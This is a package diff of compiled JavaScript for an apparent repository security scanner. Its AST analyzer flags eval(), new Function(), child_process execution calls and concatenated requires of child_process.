@@ -0,0 +1,20 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.optionalAnalyzers = exports.analyzers = void 0;
+const packageAnalyzer_1 = require("./packageAnalyzer");
+const vscodeAnalyzer_1 = require("./vscodeAnalyzer");
+const makefileAnalyzer_1 = require("./makefileAnalyzer");
+const shellScriptAnalyzer_1 = require("./shellScriptAnalyzer");
+const jsAstAnalyzer_1 = require("./jsAstAnalyzer");
+const nodeModulesAnalyzer_1 = require("./nodeModulesAnalyzer");
+exports.analyzers = [
+    packageAnalyzer_1.packageAnalyzer,
+    vscodeAnalyzer_1.vscodeAnalyzer,
+    makefileAnalyzer_1.makefileAnalyzer,
+    shellScriptAnalyzer_1.shellScriptAnalyzer,
+    jsAstAnalyzer_1.jsAstAnalyzer,
+];
+exports.optionalAnalyzers = {
+    "include-node-modules": nodeModulesAnalyzer_1.nodeModulesAnalyzer,
+};
+//# sourceMappingURL=index.js.map

package/dist/src/analyzers/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../../../src/analyzers/index.ts"],"names":[],"mappings":";;;AACA,uDAAoD;AACpD,qDAAkD;AAClD,yDAAsD;AACtD,+DAA4D;AAC5D,mDAAgD;AAChD,+DAA4D;AAI/C,QAAA,SAAS,GAAe;IACnC,iCAAe;IACf,+BAAc;IACd,mCAAgB;IAChB,yCAAmB;IACnB,6BAAa;CACd,CAAC;AAEW,QAAA,iBAAiB,GAA6B;IACzD,sBAAsB,EAAE,yCAAmB;CAC5C,CAAC"}

package/dist/src/analyzers/jsAstAnalyzer.d.ts

@@ -0,0 +1,3 @@
+import type { Finding } from "../types";
+export declare function jsAstAnalyzer(repoPath: string): Promise<Finding[]>;
+//# sourceMappingURL=jsAstAnalyzer.d.ts.map

package/dist/src/analyzers/jsAstAnalyzer.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"jsAstAnalyzer.d.ts","sourceRoot":"","sources":["../../../src/analyzers/jsAstAnalyzer.ts"],"names":[],"mappings":"AAIA,OAAO,KAAK,EAAE,OAAO,EAAE,MAAM,UAAU,CAAC;AAKxC,wBAAsB,aAAa,CAAC,QAAQ,EAAE,MAAM,GAAG,OAAO,CAAC,OAAO,EAAE,CAAC,CAqJxE"}

package/dist/src/analyzers/jsAstAnalyzer.js

@@ -0,0 +1,203 @@
+"use strict";
+var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
+}) : (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    o[k2] = m[k];
+}));
+var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
+    Object.defineProperty(o, "default", { enumerable: true, value: v });
+}) : function(o, v) {
+    o["default"] = v;
+});
+var __importStar = (this && this.__importStar) || (function () {
+    var ownKeys = function(o) {
+        ownKeys = Object.getOwnPropertyNames || function (o) {
+            var ar = [];
+            for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
+            return ar;
+        };
+        return ownKeys(o);
+    };
+    return function (mod) {
+        if (mod && mod.__esModule) return mod;
+        var result = {};
+        if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
+        __setModuleDefault(result, mod);
+        return result;
+    };
+})();
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.jsAstAnalyzer = jsAstAnalyzer;
+const fs_1 = __importDefault(require("fs"));
+const path_1 = __importDefault(require("path"));
+const glob_1 = require("glob");
+const acorn = __importStar(require("acorn"));
+const MAX_FILE_SIZE = 2 * 1024 * 1024; // 2MB
+const MAX_FILES = 10000;
+async function jsAstAnalyzer(repoPath) {
+    const findings = [];
+    const resolvedRoot = path_1.default.resolve(repoPath);
+    let jsFiles;
+    try {
+        jsFiles = await (0, glob_1.glob)("**/*.{js,mjs,cjs,ts}", {
+            cwd: resolvedRoot,
+            absolute: true,
+            ignore: [
+                "**/node_modules/**",
+                "**/.git/**",
+                "**/dist/**",
+                "**/build/**",
+                "**/coverage/**",
+            ],
+        });
+    }
+    catch {
+        return findings;
+    }
+    // Cap at 10k files
+    if (jsFiles.length > MAX_FILES) {
+        jsFiles = jsFiles.slice(0, MAX_FILES);
+    }
+    for (const filePath of jsFiles) {
+        try {
+            const stats = fs_1.default.statSync(filePath);
+            if (stats.size > MAX_FILE_SIZE)
+                continue;
+            const code = fs_1.default.readFileSync(filePath, "utf8");
+            // Parse with acorn loose configuration (handles basic TS by ignoring types if possible, though acorn is JS only. 
+            // For real TS, an AST stripper would be needed, but we'll try parsing as latest JS).
+            const ast = acorn.parse(code, {
+                ecmaVersion: "latest",
+                sourceType: "module",
+                allowHashBang: true,
+            });
+            const boundChildProcess = new Set();
+            const boundExec = new Set();
+            // A simple recursive walker
+            // eslint-disable-next-line @typescript-eslint/no-explicit-any
+            const walk = (node) => {
+                if (!node)
+                    return;
+                // ES6 Imports
+                if (node.type === "ImportDeclaration" && node.source.value === "child_process") {
+                    for (const spec of node.specifiers) {
+                        if (spec.type === "ImportDefaultSpecifier" || spec.type === "ImportNamespaceSpecifier") {
+                            boundChildProcess.add(spec.local.name);
+                        }
+                        else if (spec.type === "ImportSpecifier" && spec.imported.name === "exec") {
+                            boundExec.add(spec.local.name);
+                        }
+                    }
+                }
+                // Variable bindings
+                if (node.type === "VariableDeclarator" && node.init && node.init.type === "CallExpression") {
+                    const callee = node.init.callee;
+                    if (callee.type === "Identifier" && callee.name === "require" && node.init.arguments[0]) {
+                        const arg = node.init.arguments[0];
+                        if (arg.type === "Literal" && arg.value === "child_process") {
+                            if (node.id.type === "Identifier") {
+                                boundChildProcess.add(node.id.name);
+                            }
+                            else if (node.id.type === "ObjectPattern") {
+                                for (const prop of node.id.properties) {
+                                    if (prop.key && prop.key.type === "Identifier" && ["exec", "spawn", "execSync", "spawnSync"].includes(prop.key.name)) {
+                                        if (prop.value.type === "Identifier")
+                                            boundExec.add(prop.value.name);
+                                    }
+                                }
+                            }
+                        }
+                    }
+                }
+                // Function Calls
+                if (node.type === "CallExpression") {
+                    const callee = node.callee;
+                    // Catch require("child_" + "process")
+                    if (callee.type === "Identifier" && callee.name === "require" && node.arguments[0]) {
+                        const arg = node.arguments[0];
+                        if (arg.type === "BinaryExpression" && arg.operator === "+") {
+                            if (arg.left.type === "Literal" && arg.right.type === "Literal") {
+                                const combined = String(arg.left.value) + String(arg.right.value);
+                                if (combined === "child_process") {
+                                    findings.push(createAstFinding(filePath, "dynamic-child-process-require", "Dynamically concatenated child_process require"));
+                                }
+                            }
+                        }
+                    }
+                    if (callee.type === "Identifier") {
+                        if (callee.name === "eval") {
+                            findings.push(createAstFinding(filePath, "eval-usage", "eval() executes arbitrary strings"));
+                        }
+                        else if (boundExec.has(callee.name)) {
+                            findings.push(createAstFinding(filePath, "child-process-exec", "child_process execution called via bound variable"));
+                        }
+                    }
+                    if (callee.type === "MemberExpression") {
+                        if (callee.object.type === "Identifier" && boundChildProcess.has(callee.object.name)) {
+                            const propName = callee.property.name || (callee.property.value);
+                            if (["exec", "spawn", "execSync", "spawnSync"].includes(propName)) {
+                                findings.push(createAstFinding(filePath, "child-process", `child_process.${propName}() called`));
+                            }
+                        }
+                    }
+                }
+                // 3. new Function()
+                if (node.type === "NewExpression" && node.callee.type === "Identifier" && node.callee.name === "Function") {
+                    findings.push(createAstFinding(filePath, "function-constructor", "new Function() is equivalent to eval"));
+                }
+                for (const key in node) {
+                    if (node[key] && typeof node[key] === "object") {
+                        if (Array.isArray(node[key])) {
+                            node[key].forEach(walk);
+                        }
+                        else {
+                            walk(node[key]);
+                        }
+                    }
+                }
+            };
+            walk(ast);
+        }
+        catch {
+            // Ignore parse errors (e.g. strict TS syntax that acorn rejects)
+        }
+    }
+    // Deduplicate findings per file
+    const unique = [];
+    const seen = new Set();
+    for (const f of findings) {
+        const hash = f.file + ":" + f.rule.id;
+        if (!seen.has(hash)) {
+            seen.add(hash);
+            unique.push(f);
+        }
+    }
+    return unique;
+}
+function createAstFinding(absolutePath, ruleId, desc) {
+    // Use a heuristic relative path if we can't get root easily here, or just basename
+    const p = absolutePath.split(path_1.default.sep).slice(-3).join(path_1.default.sep);
+    return {
+        file: p, // Not strictly relative to root, but decent enough for AST findings
+        scriptName: "AST Match",
+        command: null,
+        rule: {
+            id: ruleId,
+            description: desc,
+            severity: "high",
+            category: "ast-code-execution",
+        },
+        lifecycle: false,
+        detail: "Detected via JavaScript AST parsing",
+    };
+}
+//# sourceMappingURL=jsAstAnalyzer.js.map

package/dist/src/analyzers/jsAstAnalyzer.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"jsAstAnalyzer.js","sourceRoot":"","sources":["../../../src/analyzers/jsAstAnalyzer.ts"],"names":[],"mappings":"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"}

package/dist/src/analyzers/makefileAnalyzer.d.ts

@@ -0,0 +1,3 @@
+import type { Finding, ScanOptions } from "../types";
+export declare function makefileAnalyzer(repoPath: string, opts?: ScanOptions): Promise<Finding[]>;
+//# sourceMappingURL=makefileAnalyzer.d.ts.map

package/dist/src/analyzers/makefileAnalyzer.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"makefileAnalyzer.d.ts","sourceRoot":"","sources":["../../../src/analyzers/makefileAnalyzer.ts"],"names":[],"mappings":"AAIA,OAAO,KAAK,EAAE,OAAO,EAAE,WAAW,EAAE,MAAM,UAAU,CAAC;AAErD,wBAAsB,gBAAgB,CAAC,QAAQ,EAAE,MAAM,EAAE,IAAI,CAAC,EAAE,WAAW,GAAG,OAAO,CAAC,OAAO,EAAE,CAAC,CA8D/F"}